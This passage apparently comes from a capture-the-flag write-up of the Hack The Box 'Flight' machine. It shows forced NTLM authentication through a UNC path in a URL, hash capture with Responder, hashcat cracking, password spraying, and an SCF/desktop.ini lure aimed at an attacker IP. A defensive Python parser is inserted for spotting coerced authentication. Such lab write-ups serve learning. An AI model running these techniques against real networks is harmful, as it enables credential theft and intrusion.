If the site is able to resolve remote addresses, we could also try to capture the NTLM hash of the account running the web server by making it authenticate against our SMB share. We can do this by setting up </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">responder</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/e8d05da1891a45fe9f9fa745e3f584be" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo responder -I tun0</code></span></span></p></div><div id="https://www.notion.so/729271befd3042bcab84dcc8dbb339fe" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Then, we trigger the forced NTLM authentication by navigating to:</span></span></p></div><div id="https://www.notion.so/db81e02fc1a74541907b83a19e0a2579" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">http://school.flight.htb/index.php?view=//10.10.14.47/share</code></span></span></p></div><pre id="https://www.notion.so/948ba87dc7fe45069b2bf2fdf509a305" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:cb2f5e5efd7e920b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span></span></span></code></pre><div id="https://www.notion.so/72c09e30a6ea49e18b4102144708f8c3" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Bingo! We’ve received the hash for a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString"> service account. Normally, service accounts have secure passwords that should be near-impossible to crack, but let’s copy it to a file and try to crack it anyway:</span></span></p></div><div id="https://www.notion.so/2d28fcde0efc45afb6b01a58a461d0e9" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ cat svc_apache.hash</code></span></span></p></div><pre id="https://www.notion.so/3cd0c0eda1d546c59be1c1c2e69712a8" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>svc_apache::flight:aaaaaaaaaaaaaaaa:11ad222990af24ab957608f38c26ecf1:01010000000000000090e8dda52dd90158e9f2a689392db30000000001001000740068004c006a0079004b004d00450003001000740068004c006a0079004b004d0045000200100054004a00620042004e006e00690045000400100054004a00620042004e006e0069004500070008000090e8dda52dd9010600040002000000080030003000000000000000000000000030000090bd851c7abaf60cd04a44fdfaddfb42787487148e450d50537f135845ef040b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000</span></span></span></code></pre><div id="https://www.notion.so/cc753404085b49cebf66c15842d93f50" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span 
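class="SemanticString"></span></span></p></div><div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Before cracking it, it is worth knowing what that line contains, because a defender reviewing captured or logged NTLM material can read several things straight out of it. The format is <code class="SemanticString__Fragment SemanticString__Fragment--Code">user::domain:server_challenge:NTProofStr:blob</code>. NTProofStr is an HMAC-MD5 over the server challenge and the blob, keyed with a value derived from the account’s NT hash, which is what makes offline cracking possible. The blob is the NTLMv2 client challenge: a timestamp, the client nonce and a list of AV pairs. The computer and domain names in those pairs are whatever the server we pointed the client at presented in its challenge, while <code class="SemanticString__Fragment SemanticString__Fragment--Code">MsvAvTargetName</code> is added by the client and records the SPN it believed it was authenticating to. The Python below is an added example, not code from the writeup; it parses the <code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache.hash</code> line shown above (embedded as sample input) and flags a target name that is a bare IP address rather than a domain host, a heuristic of mine for spotting coerced authentication.</span></span></p></div>

```python
"""Pull apart a NetNTLMv2 capture line (Responder / hashcat -m 5600 format).

Added example, not code from the writeup.  SAMPLE_LINE is the svc_apache.hash
line shown above, used here as sample input.  Field layout follows MS-NLMP:
    user::domain:server_challenge:NTProofStr:NTLMv2_CLIENT_CHALLENGE
where NTLMv2_CLIENT_CHALLENGE is RespType, HiRespType, 2 + 4 reserved bytes,
an 8-byte FILETIME, the 8-byte client nonce, 4 reserved bytes, then AV_PAIRs.
"""
import ipaddress
import struct
from datetime import datetime, timedelta, timezone

SAMPLE_LINE = "svc_apache::flight:aaaaaaaaaaaaaaaa:11ad222990af24ab957608f38c26ecf1:01010000000000000090e8dda52dd90158e9f2a689392db30000000001001000740068004c006a0079004b004d00450003001000740068004c006a0079004b004d0045000200100054004a00620042004e006e00690045000400100054004a00620042004e006e0069004500070008000090e8dda52dd9010600040002000000080030003000000000000000000000000030000090bd851c7abaf60cd04a44fdfaddfb42787487148e450d50537f135845ef040b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000"

AV_NAMES = {
    0x0000: "MsvAvEOL",
    0x0001: "MsvAvNbComputerName",
    0x0002: "MsvAvNbDomainName",
    0x0003: "MsvAvDnsComputerName",
    0x0004: "MsvAvDnsDomainName",
    0x0005: "MsvAvDnsTreeName",
    0x0006: "MsvAvFlags",
    0x0007: "MsvAvTimestamp",
    0x0008: "MsvAvSingleHost",
    0x0009: "MsvAvTargetName",
    0x000A: "MsvAvChannelBindings",
}
UTF16_AV_IDS = {0x0001, 0x0002, 0x0003, 0x0004, 0x0005, 0x0009}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ticks: int) -> datetime:
    """FILETIME is a count of 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_av_pairs(data: bytes) -> dict:
    """Decode the AV_PAIR list (id, length, value) that ends the client challenge."""
    pairs = {}
    offset = 0
    while offset + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, offset)
        offset += 4
        if av_id == 0x0000:  # MsvAvEOL terminates the list
            break
        value = data[offset:offset + av_len]
        offset += av_len
        name = AV_NAMES.get(av_id, f"MsvAvUnknown_{av_id:#06x}")
        if av_id in UTF16_AV_IDS:
            pairs[name] = value.decode("utf-16-le")
        elif av_id == 0x0006:  # MsvAvFlags: 32-bit little-endian bit field
            pairs[name] = struct.unpack("<I",value)[0]
        elif av_id == 0x0007:  # MsvAvTimestamp: FILETIME
            pairs[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:  # SingleHost, ChannelBindings: keep the raw bytes as hex
            pairs[name] = value.hex()
    return pairs


def parse_netntlmv2(line: str) -> dict:
    """Split a capture line into its fields and decode the client challenge blob."""
    user, _, domain, server_challenge, nt_proof_str, blob_hex = line.strip().split(":")
    blob = bytes.fromhex(blob_hex)
    resp_type, hi_resp_type, _, _, ticks, client_nonce, _ = struct.unpack_from("<BBHIQ8sI", blob, 0)
    if (resp_type, hi_resp_type) != (1, 1):
        raise ValueError("not an NTLMv2_CLIENT_CHALLENGE structure")
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge,
        "nt_proof_str": nt_proof_str,  # HMAC-MD5(NTLMv2 key, server_challenge || blob)
        "timestamp": filetime_to_datetime(ticks),
        "client_nonce": client_nonce.hex(),
        "av_pairs": parse_av_pairs(blob[28:]),  # fixed header is 28 bytes
    }


def target_is_bare_ip(parsed: dict) -> bool:
    """Heuristic of mine, not from the writeup: a client that authenticated to
    'cifs/<ip>' rather than to a domain host name is a classic sign of coerced
    authentication (UNC lure in a URL parameter, SCF/ini file on a share)."""
    target = parsed["av_pairs"].get("MsvAvTargetName", "")
    host = target.split("/", 1)[-1]
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    parsed = parse_netntlmv2(SAMPLE_LINE)
    for key, value in parsed.items():
        print(f"{key}: {value}")
    print("target is a bare IP:", target_is_bare_ip(parsed))
```

<div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">On the captured line the client reports that it was talking to <code class="SemanticString__Fragment SemanticString__Fragment--Code">cifs/10.10.14.12</code>, an SMB service addressed by IP with no domain host name, which is exactly the shape a UNC-path lure produces; a client authenticating to a legitimate domain file server records that server’s name in the same field. The timestamp also dates the capture independently of any log.</span></span></p></div><div class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span 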
class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Cracking svc_apache’s hash and checking new access</strong></span></span></p></div><div id="https://www.notion.so/1f77d8a7dc0841a88f15c4a44091ad2f" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using the standard </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">rockyou.txt</code></span><span class="SemanticString"> wordlist, we try to crack the password with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hashcat</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/56e82d35d2e34d90a51704a30c0e6d0c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ hashcat -m 5600 ./svc_apache.hash ../../rockyou.txt -o svc_apache.txt</code></span></span></p></div><pre id="https://www.notion.so/4651cf7ccc964dffac2d02073a822918" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>hashcat (v6.1.1) starting...
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:11ad222990af24ab957608f38c26ecf1:01010000000000000090e8dda52dd90158e9f2a689392db30000000001001000740068004c006a0079004b004d00450003001000740068004c006a0079004b004d0045000200100054004a00620042004e006e00690045000400100054004a00620042004e006e0069004500070008000090e8dda52dd9010600040002000000080030003000000000000000000000000030000090bd851c7abaf60cd04a44fdfaddfb42787487148e450d50537f135845ef040b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310032000000000000000000:S@Ss!K@*t13
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: SVC_APACHE::flight:aaaaaaaaaaaaaaaa:11ad222990af24a...000000
Time.Started.....: Sun Feb 12 17:34:32 2023 (6 secs)
Time.Estimated...: Sun Feb 12 17:34:38 2023 (0 secs)
Guess.Base.......: File (../../rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1831.6 kH/s (1.46ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10665984/14344385 (74.36%)
Rejected.........: 0/10665984 (0.00%)
Restore.Point....: 10661888/14344385 (74.33%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: SAESH21 -> Ryanpetter</span></span></span></code></pre><div id="https://www.notion.so/9d24dd8096d14650a095f50f97549d3a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Surprisingly, it was able to crack the password! We now have the credentials </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache:S@Ss!K@*t13</code></span><span class="SemanticString">. Let’s go back to </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">ldapsearch</code></span><span class="SemanticString"> and see if we can uncover anything new:</span></span></p></div><div id="https://www.notion.so/8060509488bc4868ad7da5c987b19933" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ ldapsearch -x -h 10.10.11.187 -D 'svc_apache@flight.htb' -w 'S@Ss!K@*t13' -b "DC=flight,DC=htb"</code></span></span></p></div><div id="https://www.notion.so/6826ff5224e24ab78e89174e1612200e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Unfortunately, this was a dead end and nothing of interest was found. 
Let’s see what services we can access with </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">crackmapexec</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/6e07643f1ab04d56a4fd09ac701e758a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec winrm 10.10.11.187 -u 'svc_apache' -p 'S@Ss!K@*t13'</code></span></span></p></div><pre id="https://www.notion.so/c7f230baa4cd4a76a6e61b0ba6f5cf91" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 5985 G0 [*] Windows 10.0 Build 17763 (name:G0) (domain:flight.htb)
HTTP 10.10.11.187 5985 G0 [*] http://10.10.11.187:5985/wsman
WINRM 10.10.11.187 5985 G0 [-] flight.htb\svc_apache:S@Ss!K@*t13</span></span></span></code></pre><div id="https://www.notion.so/348e698a967a4b90aa60934dd3e505d6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Looks like WinRM login may be disabled, which is not uncommon for service accounts. How about SMB?</span></span></p></div><div id="https://www.notion.so/81aa9001febb4e7aa091f436947212a6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13'</code></span></span></p></div><pre id="https://www.notion.so/b9ee9979175f455087c5233d667cba30" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13</span></span></span></code></pre><div id="https://www.notion.so/bfb0c0cc5fd14a30b0cbbb3ab74befab" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Nice! We can authenticate as </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString"> on SMB, let’s try to enumerate for more information such as users and shares:</span></span></p></div><div id="https://www.notion.so/8424a0efa8d5428cb2fe11e734cd99dc" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --users</code></span></span></p></div><pre id="https://www.notion.so/c2c3f1a06d4d410db1cb88ac48be47c9" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] Error enumerating domain users using dc ip 10.10.11.187: unsupported hash type MD4
SMB 10.10.11.187 445 G0 [*] Trying with SAMRPC protocol
SMB 10.10.11.187 445 G0 [+] Enumerated domain user(s)
SMB 10.10.11.187 445 G0 flight.htb\Administrator Built-in account for administering the computer/domain
SMB 10.10.11.187 445 G0 flight.htb\Guest Built-in account for guest access to the computer/domain
SMB 10.10.11.187 445 G0 flight.htb\krbtgt Key Distribution Center Service Account
SMB 10.10.11.187 445 G0 flight.htb\S.Moon Junion Web Developer
SMB 10.10.11.187 445 G0 flight.htb\R.Cold HR Assistant
SMB 10.10.11.187 445 G0 flight.htb\G.Lors Sales manager
SMB 10.10.11.187 445 G0 flight.htb\L.Kein Penetration tester
SMB 10.10.11.187 445 G0 flight.htb\M.Gold Sysadmin
SMB 10.10.11.187 445 G0 flight.htb\C.Bum Senior Web Developer
SMB 10.10.11.187 445 G0 flight.htb\W.Walker Payroll officer
SMB 10.10.11.187 445 G0 flight.htb\I.Francis Nobody knows why he's here
SMB 10.10.11.187 445 G0 flight.htb\D.Truff Project Manager
SMB 10.10.11.187 445 G0 flight.htb\V.Stevens Secretary
SMB 10.10.11.187 445 G0 flight.htb\svc_apache Service Apache web
SMB 10.10.11.187 445 G0 flight.htb\O.Possum Helpdesk</span></span></span></code></pre><div id="https://www.notion.so/269d7f860c9545d9b1ed4f8fb71bb510" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We’ll save these usernames into a </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">users.txt</code></span><span class="SemanticString"> file, as they might come in handy later. In addition, we can also enumerate for shares accessible by </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString">:</span></span></p></div><div id="https://www.notion.so/40e40be10bac4f038bd91f4f4888a983" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --shares</code></span></span></p></div><pre id="https://www.notion.so/76cb369e159f454d92e7f5488aa000c2" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ</span></span></span></code></pre><div id="https://www.notion.so/15d0c38987734e7a89ed6a5c4db438e7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can access a few shares; Shared, Users and Web are the non-standard ones. However, they held no useful files, and we only have read permissions.</span></span></p></div><div id="https://www.notion.so/7a055536dd854c8d9e47f4d44a56e4e1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">Discovering password reuse with S.Moon</strong></span></span></p></div><div id="https://www.notion.so/8a9f5f9acf23428ba4d3b5ff75c21768" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After many hours of digging, I checked for password reuse by trying </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString">'s password against the other users:</span></span></p></div><div id="https://www.notion.so/bc6dcdfb3f0f49a48f7805b0315f1f02" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' --continue-on-success</code></span></span></p></div><pre id="https://www.notion.so/e80feaf3957040c2bb141b6ede4fa32d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span 
class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\Administrator:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\Guest:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\krbtgt:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE</span></span></span></code></pre><div id="https://www.notion.so/6779b608896746f2b96339080d02e417" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">To my shock, the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">S.Moon</code></span><span class="SemanticString"> user actually shares the same password as the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">svc_apache</code></span><span class="SemanticString"> service account! It is at this point that I thought to myself, “Why didn’t I think of trying this earlier! It could have saved me so much time!”, but hindsight is always 20/20.</span></span></p></div><div id="https://www.notion.so/1e2d390e4c34483da2c67c3cab3a8a00" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Using the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">S.Moon</code></span><span class="SemanticString"> credentials, we find the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Shared</code></span><span class="SemanticString"> share is now writable:</span></span></p></div><div id="https://www.notion.so/c965a224673a46bab3ea624c28a32503" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ crackmapexec smb 10.10.11.187 -u 'S.Moon' -p 'S@Ss!K@*t13' --shares</code></span></span></p></div><pre id="https://www.notion.so/e2ec1c0f525d488ab112c82f30c9b96f" class="Code Code--NoWrap"><code><span 
class="SemanticStringArray"><span class="SemanticString"><span>SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ</span></span></span></code></pre><div id="https://www.notion.so/d02234a1130444e8bba23abd08cbb5ba" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><strong class="SemanticString__Fragment SemanticString__Fragment--Bold">SCF file attack to gather hashes</strong></span></span></p></div><div id="https://www.notion.so/a477e2986a294510bb99a8bb84c2150a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Assuming that the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Shared</code></span><span class="SemanticString"> share is frequently visited by users, we use an SCF file attack to try to capture the NTLM hash of one of them. We can do this by creating the following file:</span></span></p></div><pre id="https://www.notion.so/43111338a8104af98577259a8f8c81ed" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[Shell]
Command=2
IconFile=\\10.10.14.15\share\hello.ico
[Taskbar]
Command=ToggleDesktop</span></span></span></code></pre><div id="https://www.notion.so/7ffdfa7455e14c68baeb9efb57ce469b" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">The </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">IconFile</code></span><span class="SemanticString"> attribute is set to a non-existent share on our address. When a user’s desktop loads this file, it will try to look for the icon on our SMB share, thus authenticating and sending us the NTLM hash in the process. We save the file as an </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">.ini</code></span><span class="SemanticString"> file (e.g. </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">desktop.ini</code></span><span class="SemanticString">), then upload the file to the writable </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">Shared</code></span><span class="SemanticString"> share after mounting it locally.</span></span></p></div><div id="https://www.notion.so/256e00b1bca44da280ad8208c28e1e51" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">Once again, we set up </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">responder</code></span><span class="SemanticString"> to capture the hash:</span></span></p></div><div id="https://www.notion.so/b0feb73054e945a1a4c75d6181b4f75c" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ sudo responder -I 
tun0</code></span></span></p></div><pre id="https://www.notion.so/ca721a354bb742038ab7a5f17111b211" class="Code"><code><span class="SemanticStringArray"><span class="SemanticString"><span>[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:161e34a8843e502b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span></span></span></code></pre><div id="https://www.notion.so/695e8f4a184943dfa65aa09e29a2ea1d" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">After a short wait, we see that a user by the name </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString"> has triggered the remote query. Using the process detailed above, we crack the hash using </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">hashcat</code></span><span class="SemanticString"> and we get the credentials: </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum:Tikkycoll_431012284</code></span><span class="SemanticString"> </span></span></p></div><div id="https://www.notion.so/a0875a187abc486ca72f3d17674b79b7" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString">We can get the user flag by going to Users share and reading from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">C.Bum</code></span><span class="SemanticString">’s desktop.</span></span></p></div><h2 id="https://www.notion.so/68912a05281b4901bf0940d60216a22c" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/68912a05281b4901bf0940d60216a22c"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 
